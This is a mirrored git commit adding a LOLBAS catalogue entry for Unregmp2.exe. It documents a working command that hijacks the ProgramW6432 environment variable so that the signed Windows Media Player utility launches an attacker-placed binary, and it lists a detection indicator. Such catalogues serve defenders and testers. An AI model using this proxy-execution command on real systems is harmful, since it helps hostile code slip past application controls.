mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 07:18:05 +01:00
commit
da38f3d8ed
23
yml/OSBinaries/Unregmp2.yml
Normal file
23
yml/OSBinaries/Unregmp2.yml
Normal file
@ -0,0 +1,23 @@
|
||||
---
|
||||
Name: Unregmp2.exe
|
||||
Description: Microsoft Windows Media Player Setup Utility
|
||||
Author: 'Wade Hickey'
|
||||
Created: 2021-12-06
|
||||
Commands:
|
||||
- Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"
|
||||
Description: Allows an attacker to copy a target binary to a controlled directory and modify the 'ProgramW6432' environment variable to point to that controlled directory, then execute 'unregmp2.exe' with argument '/HideWMP' which will spawn a process at the hijacked path '%ProgramW6432%\wmpnscfg.exe'.
|
||||
Usecase: Proxy execution of binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\unregmp2.exe
|
||||
- Path: C:\Windows\SysWOW64\unregmp2.exe
|
||||
Detection:
|
||||
- IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`
|
||||
Resources:
|
||||
- Link: https://twitter.com/notwhickey/status/1466588365336293385
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
Loading…
Reference in New Issue
Block a user